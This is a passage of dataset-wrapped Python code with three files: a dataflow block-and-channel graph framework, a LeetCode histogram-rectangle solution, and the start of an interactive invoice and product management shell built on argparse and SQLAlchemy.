time stamp from a list of Data objects,\n just call min(list_of_Data_objects).\n \"\"\"\n return self.time\n\n\nclass Channel(comparable_interface.Comparable):\n \"\"\"\n A channel must have exactly one input block (the producer) and may have zero or more output blocks (consumers).\n When the producer uses the is_open() method to ask the channel whether new data can be shoved into the channel,\n it is asking whether all consumers have pulled a copy of the data.\n \"\"\"\n\n def __init__(self):\n self.value = None\n self.consumers = {} # Key = Datablock object, Value = boolean indicating whether they're ready for more data\n self.producer = None\n self.debug_name_string = None\n self.active = False\n\n def _cmpkey(self):\n \"\"\"\n Provided for the functionality in comparable_interface.\n Comparisons on Data objects will use the time field.\n So, for example, to get the Data object with the earliest time stamp from a list of Data objects,\n just call min(list_of_Data_objects).\n \"\"\"\n return self.value\n\n def __repr__(self):\n \"\"\"\n __repr__ is overloaded in order to simplify debugging.\n \"\"\"\n return self.debug_name()\n\n def set_debug_name(self, name):\n \"\"\"\n set_debug_name overrides the return value of str(self).\n To return this to what the user of a python debugger would normally expect, run:\n c.set_debug_name('<%s.%s object at %s>' % (c.__class__.__module__, c.__class__.__name__, hex(id(c))))\n assuming your channel object is referred to by 
variable c.\n \"\"\"\n self.debug_name_string = name\n\n def debug_name(self):\n if self.debug_name_string:\n return self.debug_name_string\n else:\n return \"Channel connecting \" + str(self.producer) + \" to \" + str(self.consumers)\n\n def time(self):\n return self.value.time\n\n def get_value(self, consumer=None):\n \"\"\"\n If consumer is specified, the channel will record that consumer as having consumed the value.\n \"\"\"\n if consumer:\n self.consumers[consumer] = True\n return self.value\n\n def set_value(self, value):\n self.value = value\n self.active = True\n logging.debug(\"# Setting value in <\" + str(self) + \">: \" + str(self.value))\n self.mark_consumer_plates_full()\n\n def activate(self):\n self.active = True\n\n def deactivate(self):\n self.active = False\n\n def has_data(self):\n return self.value is not None\n\n def is_open(self):\n for ready_for_more_data in self.consumers.values():\n if not ready_for_more_data:\n return False\n return True\n\n def mark_consumer_plates_full(self):\n self.set_consumer_status(False)\n\n def mark_consumers_hungry_for_more(self):\n self.set_consumer_status(True)\n\n def set_consumer_status(self, status, consumer=None):\n if consumer:\n self.consumers[consumer] = status\n else:\n for consumer in self.consumers.keys():\n self.consumers[consumer] = status\n\n def add_producer(self, producer):\n self.producer = producer\n\n def add_consumer(self, consumer):\n self.consumers[consumer] = True\n\n def get_consumers(self):\n \"\"\"\n consumers are currently just DataBlock objects. There's still an open question as to whether we will need\n both the DataBlock and the channel name on which it is subscribing to this information.\n \"\"\"\n return self.consumers.keys()\n\n\nclass Connectable():\n \"\"\"\n Connectable objects are designed to enable syntax helpers for wiring blocks together.\n \"\"\"\n def __init__(self, block, channel_name):\n self.block = block\n self.channel_name = channel_name\n\n def __rshift__(self, other):\n connect(self.block, self.channel_name, other.block, other.channel_name)\n return other\n\n\nclass DataBlock():\n \"\"\"\n User implementations of data blocks should derive from the DataBlock class and implement the block_code()\n instance method. 
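A minimal sketch of such a subclass (hedged; the 'in'/'out' channel names are\n    illustrative, not part of the framework):\n\n        class Doubler(DataBlock):\n            def block_code(self):\n                self.set_output_data('out', 2 * self.get_input('in'))\n\n    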
The block_code() method will be called after some preamble code whenever the block is driven\n by a call to its step() method.\n \"\"\"\n\n __metaclass__ = abc.ABCMeta # Defined so that we can mark block_code() as an abstract method\n\n def __init__(self):\n self.input_channels = {} # Keys = channel name, Values = Channel objects\n self.input_data = {} # Keys = channel name, Values = Data objects\n self.output_channels = {} # Keys = channel name, Values = Channel objects\n self.priority = 100 # Lower numbers have higher priority\n # The execution of each iteration of a block has a specific definition of \"now\".\n self.time = 0\n self.termination_reached = False\n self.debug_name = '<%s.%s object at %s>' % (self.__class__.__module__, self.__class__.__name__, hex(id(self)))\n self.start_time = None\n self.end_time = None\n self.block_initialization()\n\n def __repr__(self):\n \"\"\"\n __repr__ is overloaded in order to simplify debugging.\n self.debug_name defaults to what would ordinarily be seen as a response to self.__repr__ but user code\n can call set_debug_name() to override this, and we take advantage of it in the subclasses that enable\n syntax helpers for defining blocks.\n \"\"\"\n return self.debug_name\n\n def __cmp__(self, other):\n \"\"\"\n Comparison operator is provided so that blocks can have different priorities for execution order.\n TODO: Code that actually uses priorities has been removed, so we may consider getting rid of this.\n \"\"\"\n return cmp(self.priority, other.priority)\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Defining __call__ makes it possible to let users take advantage of this connection syntax:\n \"\"\"\n return Connectable(self, args[0])\n\n def set_debug_name(self, name):\n self.debug_name = name\n\n def terminate(self):\n self.termination_reached = True\n for channel_name in self.output_channels.keys():\n self.output_channels[channel_name].deactivate()\n\n def terminated(self):\n return self.termination_reached\n\n def increment_time(self):\n if isinstance(self.time, int):\n # If time isn't an int, user has overridden it, and it will be up to them to increment time.\n self.time += 1\n\n def set_start(self, start):\n self.start_time = start\n\n def set_end(self, end):\n self.end_time = end\n\n def _before_valid_time_range(self):\n \"\"\"\n In case of uncertainty (times not specified), we assume that we are in a valid range.\n \"\"\"\n if self.start_time is not None:\n try:\n if self.time < self.start_time:\n return True\n except TypeError:\n return False\n return False\n\n def _after_valid_time_range(self):\n \"\"\"\n In case of uncertainty (times not specified), we assume that we are in a valid range.\n \"\"\"\n if self.end_time is not None:\n try:\n if self.time > self.end_time:\n return True\n except TypeError:\n return False\n return False\n\n def _in_valid_time_range(self):\n \"\"\"\n If start_time or end_time is set and current time is outside the specified range, return False.\n If time window is not comparable with current time (as would be the case if user code specifies the time to\n be of a different type), we have not gotten far enough into the process to make a decision, and default to True.\n All other cases return True.\n \"\"\"\n if self._before_valid_time_range() or self._after_valid_time_range():\n return False\n else:\n return True\n\n def set_input_data(self, key, value):\n \"\"\"\n set_input_data will automatically create an input channel if necessary.\n Automatic channel creation is intended for the case where users are 
trying to set initial values on a block\n whose input channels aren't subscribed to anything in the graph.\n \"\"\"\n if not key in self.input_channels.keys():\n self.set_input_channel(key, Channel())\n self.input_channels[key].set_value(Data(self.time, value))\n\n def _get_input_data_object(self, key):\n \"\"\"\n _get_input_data_object() not typically used by user-defined subclasses, because it retrieves data objects from\n all input channels, as opposed to data objects that have already been pulled into block-local storage from those\n input channels.\n \"\"\"\n return self.input_channels[key].get_value(self)\n\n def get_input(self, key):\n \"\"\"\n get_input() only looks at data that has already been pulled from a channel.\n \"\"\"\n return self.input_data[key].data\n\n def _get_all_input_data_objects(self):\n inputs = {}\n for input_name in self.input_channels.keys():\n inputs[input_name] = self.input_channels[input_name].get_value(self)\n return inputs\n\n def _get_all_input_values(self):\n input_values = {}\n for input_name in self.input_channels.keys():\n channel = self.input_channels[input_name]\n data_object = channel.get_value(self)\n input_values[input_name] = data_object.data\n return input_values\n\n def clear_inputs(self):\n for input_channel in self.input_channels.values():\n input_channel.set_readiness(False, self)\n\n def clear_outputs(self):\n for output_channel in self.output_channels.values():\n output_channel.set_readiness(False)\n\n def set_output_data(self, key, value):\n self.get_output_channel(key).set_value(Data(self.time, value))\n\n def read_output_data(self, key=None):\n if key:\n return self.output_channels[key].get_value()\n else:\n output_data = {}\n for channel_name in self.output_channels.keys():\n output_data[channel_name] = self.output_channels[channel_name].get_value()\n return output_data\n\n def get_output_channel(self, output_channel_name):\n \"\"\"\n get_output_channel will create a new channel object if necessary.\n \"\"\"\n if not output_channel_name in self.output_channels.keys():\n self.output_channels[output_channel_name] = Channel()\n self.output_channels[output_channel_name].add_producer(self)\n return self.output_channels[output_channel_name]\n\n def pass_data_through(self, data=None):\n if data:\n for channel_name in data.keys():\n self.set_output_data(channel_name, data[channel_name])\n else:\n for channel_name in self.input_channels.keys():\n self.set_output_data(channel_name, self.read_input_data(channel_name))\n\n def set_input_channel(self, input_channel_name, channel):\n self.input_channels[input_channel_name] = channel\n channel.add_consumer(self)\n\n def get_input_channel_names(self):\n return self.input_channels.keys()\n\n def get_output_channel_names(self):\n return self.output_channels.keys()\n\n def advance_self_to_latest_time_of_pulled_data(self):\n for data_object in self.input_data.values():\n if not isinstance(data_object.time, int) and isinstance(self.time, int):\n # User has overridden time to be a new type. It would be cleaner to set a flag indicating\n # that a user has overridden it, and possibly store the value in a different variable, but\n # that approach has the cost that we would have to pass the flag through the channels with each\n # message.\n self.time = data_object.time\n continue\n if data_object.time > self.time:\n self.time = data_object.time\n\n def step(self):\n \"\"\"\n Returns a set of DataBlocks whose inputs were updated. 
This will be used by the Graph run() method to invoke\n the step() method of the next blocks in the chain (we don't invoke those call the step() method of those\n blocks directly from here, because then the stack could get quite large).\n \"\"\"\n # This method will typically have been called by the scheduler as a result of either (A) this block\n # is registered at the head of the graph, or (B) there is a state change in the inputs.\n #\n # 1. Check to see whether downstream (output) channels are accepting input (all of the channel's\n # consumers have pulled the \"next\" value).\n # If any output channel is not accepting input, abort.\n # 2. Find minimum time in the \"next\" fields of all of my own input channels. Pull that time\n # (or times -- in a tie, everybody wins) into my own \"current\" fields and look for state changes.\n # If no state changes, abort.\n # 3. Check whether all inputs are satisfied. If any are unsatisfied, abort.\n # 4. Execute user code (which fills downstream channels \"next\" fields)\n # 5. For each downstream channel, append all consumers to return value.\n # 6. Return set of downstream blocks that are candidates for execution.\n\n\n\n # REPLACEMENT FOR STEP 5:\n # Logic for execution flow WAS to:\n # Execute a block. Look at all output channels to which the block provided data on that iteration.\n # For each of those channels, nominate each of their consumers as candidates for running next.\n # Trigger the set of unique candidates.\n # The problem with this logic is that channels now buffer data, possibly for multiple iterations.\n # The downstream blocks aren't always eligible to execute right away, and we basically forget to execute\n # them on future iterations (because if they aren't provided new input, they won't be candidates, but\n # they may legitimately need to pull data from their input channel buffers and execute).\n #\n # So instead of all that fancy logic, we basically say screw it. Traverse the whole graph and offer\n # everybody the chance to run -- including blocks that are downstream of some that do not run on this iteration!\n\n downstream_blocks = []\n\n\n # Restrict the set of input channels we consider to those that are active (a channel is typically deactivated\n # before it starts producing useful data, and after it has reached the end of useful data)\n active_input_channels = {}\n active_input_channels_names = [channel_name for channel_name in self.input_channels.keys()\n if self.input_channels[channel_name].active]\n active_input_channels = {name:self.input_channels[name] for name in active_input_channels_names}\n\n # If this is a block that has one or more input channels but none of them are active, bail out:\n if self.input_channels and not active_input_channels:\n return downstream_blocks\n\n # 2. Pull data for earliest time. 
If there are no input channels, we just proceed:\n unprocessed_input_channels = {}\n if active_input_channels:\n\n # Get the collection of channels from which I have not already consumed data:\n unprocessed_input_channel_names = [channel_name for channel_name in active_input_channels.keys()\n if not active_input_channels[channel_name].consumers[self]]\n unprocessed_input_channels = {name:active_input_channels[name] for name in unprocessed_input_channel_names}\n unprocessed_channel_with_earliest_data = min(unprocessed_input_channels.values())\n if not unprocessed_input_channels:\n # If I have some input channels but none of them are unprocessed, then there is no data to be pulled\n # and I must be done.\n return downstream_blocks\n\n if unprocessed_input_channels:\n state_change = False\n for input_channel_name in unprocessed_input_channels.keys():\n if unprocessed_input_channels[input_channel_name] <= unprocessed_channel_with_earliest_data:\n new_data = unprocessed_input_channels[input_channel_name].get_value(self) # gets value AND marks as consumed.\n logging.debug(\"==> Pulling data (\" + str(new_data.data) + \") from channel '\" +\n input_channel_name + \"' -- \" + str(self))\n if (not self.input_data) or \\\n (not input_channel_name in self.input_data) or \\\n self.input_data[input_channel_name] != new_data:\n state_change = True\n self.input_data[input_channel_name] = new_data\n if not state_change:\n return downstream_blocks\n self.advance_self_to_latest_time_of_pulled_data()\n\n for input_name in self.input_data.keys():\n logging.debug(\"# BLOCK \" + str(self) + \": time=\" + str(self.time) + \", \" + str(input_name) + \" = \" +\n str(self.input_data[input_name]))\n\n # 3. Ensure inputs satisfied (note that we want input data for all channels, not just those currently active):\n if self.input_channels:\n for input_channel_name in self.input_channels.keys():\n if input_channel_name not in self.input_data.keys():\n logging.debug(\" Channel \" + input_channel_name + \" not satisfied. Bailing out.\")\n return downstream_blocks\n\n # Ensure at least one downstream channel is open.\n # Note that this has to happen after pulling data from the input channels in order to properly accommodate the\n # case in which a block consumes its own outputs.\n at_least_one_channel_open = False\n for output_channel in self.output_channels.values():\n if output_channel.is_open():\n at_least_one_channel_open = True\n break\n if not at_least_one_channel_open:\n return downstream_blocks\n\n # 4. Execute user code:\n logging.debug(\"Executing block code for: \" + str(self))\n self.block_code() # the block_code() method is responsible for setting new values in the output channels\n # logging.debug(\"After executing user code, block time is: \" + str(self.time))\n\n for output_channel in self.output_channels.values():\n if self._in_valid_time_range():\n for consumer in output_channel.get_consumers():\n # logging.debug(str(self) + \" is nominating block to append to run list: \" + str(consumer))\n downstream_blocks.append(consumer)\n else:\n output_channel.mark_consumers_hungry_for_more()\n if self._after_valid_time_range():\n self.terminate()\n\n # 6. 
Return collection of downstream neighbors:\n return downstream_blocks\n\n def block_initialization(self):\n return\n\n def set_input_connection(self, channel_name, channel):\n self.input_channels[channel_name] = channel\n\n def set_output_connection(self, source_channel, destination_block, destination_channel):\n self.output_channels[source_channel] = [destination_block, destination_channel]\n # self.set_output_data(source_channel, None)\n\n @abc.abstractmethod\n def block_code(self):\n return\n\n\nclass BaseFilter(DataBlock):\n\n def __repr__(self):\n \"\"\"\n __repr__ is overloaded in order to simplify debugging.\n \"\"\"\n return \"Filter that wraps predicate \" + str(self.predicate)\n\n @abc.abstractmethod\n def predicate(self):\n return False\n\n def block_code(self):\n if self.predicate():\n self.pass_data_through()\n else:\n self.clear_outputs()\n self.clear_inputs()\n\n\nclass Block(DataBlock):\n \"\"\"\n User function should return a map of output arg names and values.\n \"\"\"\n\n def __init__(self, user_function):\n DataBlock.__init__(self)\n self.user_function = user_function\n self.clear_inputs()\n self.debug_name = \"Block that wraps \" + str(self.user_function)\n\n for argname in user_function.func_code.co_varnames:\n # We only need to handle the implicitly defined inputs. All others are defined by the graph connections:\n if argname == 'previous_outputs':\n # Blocks implicitly subscribe to their own outputs, but this information is clobbered if they also\n # subscribe to some other block's outputs on the same input channel. Note that this ordering guarantee\n # needs to be inspected more closely if we start doing things in parallel.\n self.set_input_channel(argname, self.get_output_channel(argname))\n self.set_input_data(argname, {})\n\n def block_code(self):\n inputs = self._get_all_input_values()\n outputs = self.user_function(**inputs)\n if outputs:\n for key in outputs.keys():\n self.set_output_data(key, outputs[key])\n if 'previous_outputs' in self.output_channels.keys():\n self.output_channels['previous_outputs'].set_value(Data(self.time, copy.deepcopy(outputs)))\n\n\nclass GeneratorBlock(Block):\n def __init__(self, user_function):\n Block.__init__(self, user_function)\n self.first_time = True\n\n def block_code(self):\n inputs = self._get_all_input_values()\n outputs = {}\n \"\"\"\n self.f = self.user_function(**inputs)\n try:\n outputs = self.f.send(inputs)\n except StopIteration:\n self.terminate()\n \"\"\"\n if self.first_time:\n self.f = self.user_function(**inputs)\n outputs = self.f.next()\n self.first_time = False\n else:\n try:\n outputs = self.f.send(inputs)\n except StopIteration:\n self.terminate()\n\n if outputs:\n for key in outputs.keys():\n self.set_output_data(key, outputs[key])\n if 'previous_outputs' in self.output_channels.keys():\n self.output_channels['previous_outputs'].set_value(Data(self.time, copy.deepcopy(outputs)))\n\nclass Filter(Block):\n \"\"\"\n User function should return a Boolean.\n If True, all input args will be passed unmodified as output args.\n If False, all output args will have a value of None.\n \"\"\"\n def block_code(self):\n inputs = self._get_all_input_values()\n filter_result = self.user_function(**inputs)\n if filter_result:\n self.pass_data_through(inputs)\n else:\n self.clear_outputs()\n\nclass PassThrough(Block):\n \"\"\"\n User function need not return anything. 
We just pass all inputs to outputs, unmodified.\n    \"\"\"\n    def block_code(self):\n        inputs = self._get_all_input_values()\n        self.user_function(**inputs)  # invoked for its side effects only; the return value is ignored\n        self.pass_data_through(inputs)\n\n\nclass Terminator(Block):\n    \"\"\"\n    Terminator is a convenient mechanism for setting global termination conditions.\n    Just provide a predicate that returns a boolean.\n    \"\"\"\n\n    def block_code(self):\n        inputs = self._get_all_input_values()\n        filter_result = self.user_function(**inputs)\n        if filter_result:\n            self.pass_data_through(inputs)\n        else:\n            self.clear_outputs()\n\n\nclass MasterControlBlock(DataBlock):\n    \"\"\"\n    The MasterControlBlock provides a way to kill the simulation.\n    Simply set a non-True value on its 'continue' input channel.\n    The block is somewhat unique in that it acts immediately when an input value is set. This guarantees that it\n    executes before other blocks that are peers in the graph (the usual approach is that all inputs for all peers\n    get set in arbitrary order and then -- again in arbitrary order -- the step() method is called for all peers).\n    \"\"\"\n    def block_initialization(self):\n        self.priority = 0 # Lower numbers have higher priority\n\n    def block_code(self):\n        if not self.read_input_data('continue'):\n            graph = self.read_input_data('graph')\n            graph.terminate()\n        return\n\n\nclass Graph():\n    def __init__(self, head=None):\n        self.heads = []\n        if head:\n            self.add_head(head)\n        self.master_control_block = MasterControlBlock()\n        self.master_control_block.set_input_data('graph', self)\n\n    def add_head(self, block):\n        self.heads.append(block)\n\n    def set_termination_condition(self, source_block, source_channel):\n        connect(source_block, source_channel, self.master_control_block, 'continue')\n\n    def run(self, start=None, end=None):\n        # TODO: It would be a good optimization to make sure that if X is upstream of Y, X has the opportunity to\n        # run first in any given iteration. 
This is an optimization, not a requirement (but it turns out to be really\n # easy to create bugs in the logic in the block step() method that are resolved if this is a requirement).\n run_set = set()\n for head in self.heads:\n run_set.add(head)\n head.set_start(start)\n head.set_end(end)\n while run_set: # Run through multiple iterations of entire graph\n while run_set: # Run through a single iteration of entire graph\n block = run_set.pop()\n for downstream_block in block.step():\n run_set.add(downstream_block)\n for head in self.heads:\n if not head.terminated():\n head.increment_time()\n run_set.add(head)\n\n\ndef connect(source_block, source_channel_name, destination_block, destination_channel_name):\n channel = source_block.get_output_channel(source_channel_name)\n destination_block.set_input_channel(destination_channel_name, channel)\n","sub_path":"conduit/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":27648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"587149688","text":"# 给定 n 个非负整数,用来表示柱状图中各个柱子的高度。每个柱子彼此相邻,且宽度为 1 。 \n# \n# 求在该柱状图中,能够勾勒出来的矩形的最大面积。 \n# \n# \n# \n# \n# \n# 以上是柱状图的示例,其中每个柱子的宽度为 1,给定的高度为 [2,1,5,6,2,3]。 \n# \n# \n# \n# \n# \n# 图中阴影部分为所能勾勒出的最大矩形面积,其面积为 10 个单位。 \n# \n# \n# \n# 示例: \n# \n# 输入: [2,1,5,6,2,3]\n# 输出: 10 \n# Related Topics 栈 数组 \n# 👍 899 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n\n # \"\"\"\n # 枚举左右边界 超时\n # \"\"\"\n #\n # length = len(heights)\n # maxVal = 0\n # for i in xrange(length):\n # minHeight = float(\"inf\")\n # for j in range(i,length):\n # minHeight = min(minHeight, heights[j])\n # maxVal = max(maxVal, (j-i+1)*minHeight)\n #\n # return maxVal\n\n \"\"\"\n \n \"\"\"\n new_len = len(heights) + 2\n newHeights = [0] * new_len\n newHeights[1:-1] = heights[:]\n\n maxArea = 0\n stack = [0]\n for i in range(1, new_len):\n while stack and newHeights[stack[-1]] > newHeights[i]:\n height = newHeights[stack.pop()]\n while stack and newHeights[stack[-1]] == height:\n stack.pop()\n width = i - stack[-1] - 1 if stack else i\n maxArea = max(maxArea, height * width)\n stack.append(i)\n\n return maxArea\n\n \"\"\" \n 左边看一下,看最多能向左延伸多长,找到大于等于当前柱形高度的最左边元素的下标;\n 右边看一下,看最多能向右延伸多长;找到大于等于当前柱形高度的最右边元素的下标。\n \"\"\"\n\n \n # n = len(heights)\n # left, right = [0] * n, [n] * n\n #\n # mono_stack = list()\n # for i in range(n):\n # while mono_stack and heights[mono_stack[-1]] >= heights[i]:\n # right[mono_stack[-1]] = i\n # mono_stack.pop()\n # left[i] = mono_stack[-1] if mono_stack else -1\n # mono_stack.append(i)\n #\n # ans = max((right[i] - left[i] - 1) * heights[i] for i in range(n)) if n > 0 else 0\n # return ans\n\n\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"week01/[84]柱状图中最大的矩形.py","file_name":"[84]柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"159289204","text":"#!/usr/bin/python3 -O\n# pylint: disable=unused-argument,no-self-use,attribute-defined-outside-init\n\nimport argparse\nimport cmd\nimport datetime\nimport decimal\nimport os\nimport pdb\nimport shlex\nimport subprocess\n\nimport dateutil.parser\nimport sqlalchemy.orm.exc\n\nimport invoice\nimport invoice.db\n\nclass ArgCmd(cmd.Cmd):\n def parseline(self, line):\n \"\"\"Parse the line into a command name and a string 
containing\n the arguments. Returns a tuple containing (command, args, line).\n 'command' and 'args' may be None if the line couldn't be parsed.\n\n If there is attribute parser_*, args are returned as\n argparse.Namespace as parsed by respective parser.\n \"\"\"\n\n line = line.strip()\n if not line:\n return None, None, line\n elif line[0] == '?':\n line = 'help ' + line[1:]\n elif line[0] == '!':\n if hasattr(self, 'do_shell'):\n line = 'shell ' + line[1:]\n else:\n return None, None, line\n i, n = 0, len(line)\n while i < n and line[i] in self.identchars:\n i = i+1\n command, arg = line[:i], line[i:].strip()\n try:\n arg = getattr(self, 'parser_'+command).parse_args(shlex.split(arg))\n except AttributeError:\n pass\n except SystemExit:\n return command, None, line\n return command, arg, line\n\n def onecmd(self, line):\n \"\"\"Interpret the argument as though it had been typed in response\n to the prompt.\n\n This may be overridden, but should not normally need to be;\n see the precmd() and postcmd() methods for useful execution hooks.\n The return value is a flag indicating whether interpretation of\n commands by the interpreter should stop.\n\n \"\"\"\n command, arg, line = self.parseline(line)\n if not line:\n return self.emptyline()\n if arg is None:\n return False\n if command is None:\n return self.default(line)\n self.lastcmd = line\n if line == 'EOF':\n self.lastcmd = ''\n if command == '':\n return self.default(line)\n else:\n try:\n func = getattr(self, 'do_' + command)\n except AttributeError:\n return self.default(line)\n return func(arg)\n\n def do_help(self, arg):\n 'Show this help'\n if arg:\n if not hasattr(self, 'do_' + arg):\n self.stdout.write('No such command: {}\\n'.format(arg))\n return\n if hasattr(self, 'parser_' + arg):\n self.stdout.write(getattr(self, 'parser_'+arg).format_help())\n return\n if getattr(self, 'do_'+arg).__doc__:\n self.stdout.write(getattr(self, 'do_'+arg).__doc__ + '\\n')\n return\n self.stdout.write('No help for {}.\\n'.format(arg))\n else:\n self.stdout.write('Available commands:\\n')\n for command in sorted(name[3:]\n for name in self.get_names() if name.startswith('do_')):\n if command == 'EOF':\n continue\n description = None\n if hasattr(self, 'parser_' + command):\n description = getattr(self, 'parser_' + command).description\n if not description:\n description = getattr(self, 'do_' + command).__doc__\n if description and '\\n' in description:\n description = description[description.find('\\n')]\n if description:\n self.stdout.write(\n ' {:10s} {}\\n'.format(command, description))\n else:\n self.stdout.write(' {:10s}\\n'.format(command))\n self.stdout.write('\\nType `help COMMAND` or `COMMAND -h`'\n ' to get help about a particular command.\\n\\n')\n\n def do_pdb(self, arg):\n 'Break to PDB debugger.'\n pdb.set_trace()\n\n @staticmethod\n def cmderror(parser, msg):\n try:\n parser.error(msg)\n except SystemExit:\n pass\n\n\nclass CmdProduct(ArgCmd):\n def preloop(self):\n self.prompt = 'product {}> '.format(self.product.code)\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show product summary.')\n def do_show(self, args):\n print(str(self.product))\n\n parser_name = argparse.ArgumentParser(prog='name',\n description='Change product name.')\n parser_name.add_argument('name', help='New name')\n def do_name(self, args):\n self.product.name = args.name\n\n parser_unit = argparse.ArgumentParser(prog='unit',\n description='Change unit of measurement.')\n parser_unit.add_argument('unit', help='New unit')\n def 
do_unit(self, args):\n self.product.unit = args.unit\n\n parser_price = argparse.ArgumentParser(prog='price',\n description='Change unit price.')\n parser_price.add_argument('currency', help='Currency')\n parser_price.add_argument('price', help='New price')\n def do_price(self, args):\n self.product.set_price(args.currency, args.price)\n\n parser_bprice = argparse.ArgumentParser(prog='bprice',\n description='Change price to match given brutto unit price.')\n parser_bprice.add_argument('currency', help='Currency')\n parser_bprice.add_argument('bprice', help='New brutto price')\n def do_bprice(self, args):\n self.product.set_bprice(args.currency, args.bprice)\n\n parser_vat = argparse.ArgumentParser(prog='vat',\n description='Change VAT rate.')\n parser_vat.add_argument('vat', help='New vat')\n def do_vat(self, args):\n self.product.vat = args.vat\n\n parser_set = argparse.ArgumentParser(prog='set',\n description='Set attribute.')\n parser_set.add_argument('attr', choices=['name', 'unit', 'vat'],\n help='Attribute to change')\n parser_set.add_argument('value', help='New value')\n def do_set(self, args):\n setattr(self.product, args.attr, args.value)\n\n # TODO def complete_set\n\n parser_save = argparse.ArgumentParser(prog='save',\n description='Exit to parent menu saving changes.')\n def do_save(self, args):\n invoice.db.session.commit()\n return True\n\n parser_discard = argparse.ArgumentParser(prog='discard',\n description='Exit to parent menu discarding changes.')\n def do_discard(self, args):\n invoice.db.session.rollback()\n return True\n\n def do_EOF(self, args):\n self.stdout.write('\\nChoose `discard` or `save`; ^D does not work.\\n')\n\n\nclass CmdProducts(ArgCmd):\n prompt = 'products> '\n\n parser_ls = argparse.ArgumentParser(prog='ls',\n description='List all products.')\n def do_ls(self, args):\n self.stdout.write(invoice.env.get_template('products.txt').render(\n products=invoice.db.session.query(invoice.db.Product)))\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show product summary.')\n parser_show.add_argument('code', help='Product code')\n def do_show(self, args):\n self.stdout.write(str(invoice.db.session.query(\n invoice.db.Product).filter_by(code=args.code).one()) + '\\n')\n\n def complete_show(self, text, line, begidx, endidx):\n return sorted(code + ' '\n for code, in invoice.db.session.query(invoice.db.Product.code)\n if code.startswith(text))\n\n parser_add = argparse.ArgumentParser(prog='add',\n description='Add new product to the database')\n parser_add.add_argument('--unit', '-u', default='szt.',\n help='Unit of measurement [default: %(default)s]')\n\n# group = parser_add.add_mutually_exclusive_group(required=True)\n# group.add_argument('--price', '-p', type=float,\n# help='Unit price netto')\n# group.add_argument('--bprice', '-P', type=float,\n# help='Unit price brutto')\n# del group\n\n parser_add.add_argument('--vat', '-v', type=decimal.Decimal, default=23,\n help='VAT factor in %% [default: 23]')\n parser_add.add_argument('code', metavar='CODE',\n help='Product code')\n parser_add.add_argument('name', metavar='NAME',\n help='Product name')\n\n def do_add(self, args):\n if not args.code:\n self.cmderror(self.parser_add, 'code must not be empty')\n return\n\n try:\n invoice.db.session.add(invoice.db.Product(code=args.code,\n name=args.name, unit=args.unit, vat=args.vat))\n except Exception as e:\n invoice.db.session.rollback()\n self.stdout.write('{}: {!s}\\n'.format(e.__class__.__name__, e))\n else:\n invoice.db.session.commit()\n\n 
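# A hedged usage sketch of the parser defined above (values are illustrative):\n    #   products> add --unit kg --vat 8 APL Apples\n    # would insert Product(code='APL', name='Apples', unit='kg', vat=Decimal('8')).\n\n    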
parser_del = argparse.ArgumentParser(prog='del',\n description='Delete product from database.')\n parser_del.add_argument('code', help='Product code')\n def do_del(self, args):\n 'del -- delete product from the database'\n try:\n invoice.db.session.delete(invoice.db.session.query(\n invoice.db.Product).filter_by(code=args.code).one())\n except Exception as e:\n invoice.db.session.rollback()\n self.stdout.write('{}: {!s}\\n'.format(e.__class__.__name__, e))\n else:\n invoice.db.session.commit()\n complete_del = complete_show\n\n parser_open = argparse.ArgumentParser(prog='open',\n description='Open a product for editing.')\n parser_open.add_argument('code', help='Product code')\n def do_open(self, args):\n cli = CmdProduct()\n try:\n cli.product = invoice.db.session.query(\n invoice.db.Product).filter_by(code=args.code).one()\n except sqlalchemy.orm.exc.NoResultFound:\n self.cmderror(self.parser_open,\n 'no such product: {!r}\\n'.format(args.code))\n return\n\n try:\n cli.cmdloop()\n except Exception: # as e:\n invoice.db.session.rollback()\n raise\n# self.stdout.write('{}: {!s}\\n'.format(e.__class__.__name__, e))\n complete_open = complete_show\n\n parser_exit = argparse.ArgumentParser(prog='exit',\n description='Return to parent menu.')\n def do_exit(self, args):\n return True\n\n def do_EOF(self, args):\n self.stdout.write('\\n')\n return True\n\n\nclass CmdInvoice(ArgCmd):\n def preloop(self):\n self.prompt = 'invoice {}> '.format(self.invoice.number)\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show current invoice (equivalent to `ls`'\n ' with header and footer)')\n def do_show(self, args):\n self.stdout.write(str(self.invoice) + '\\n')\n\n parser_ls = argparse.ArgumentParser(prog='ls',\n description='List invoice contents (equivalent to `show`'\n ' without header and footer).')\n def do_ls(self, args):\n self.stdout.write(invoice.env.get_template('invoice.txt').render(\n invoice=self.invoice, short=True) + '\\n')\n\n parser_add = argparse.ArgumentParser(prog='add',\n description='Add new line to invoice')\n\n group = parser_add.add_mutually_exclusive_group()\n group.add_argument('--price', '-p', type=decimal.Decimal,\n help='Unit price netto')\n group.add_argument('--bprice', '-P', type=decimal.Decimal,\n help='Unit price brutto')\n group.add_argument('--netto', '-n', type=decimal.Decimal,\n help='Total price netto')\n group.add_argument('--brutto', '-b', type=decimal.Decimal,\n help='Total price brutto')\n del group\n\n parser_add.add_argument('--vat', '-v', type=decimal.Decimal,\n help='VAT factor')\n parser_add.add_argument('product', metavar='PRODUCT',\n help='Product code')\n parser_add.add_argument('amount', metavar='AMOUNT', type=decimal.Decimal,\n help='Amount (in respective units)')\n\n def do_add(self, args):\n if not args.product:\n self.cmderror(self.parser_add, 'product must not be empty')\n return\n\n if not args.amount:\n self.cmderror(self.parser_add, 'amount must not be empty')\n return\n\n self.invoice.add_line(args.product, args.amount,\n price=args.price, bprice=args.bprice, netto=args.netto,\n brutto=args.brutto, vat=args.vat)\n\n parser_del = argparse.ArgumentParser(prog='del',\n description='Delete invoice line.')\n parser_del.add_argument('line', metavar='LINE', type=int,\n help='Line number.')\n def do_del(self, args):\n del self.invoice.lines[args.line - 1]\n\n def do_modify(self, args):\n pass\n\n parser_set = 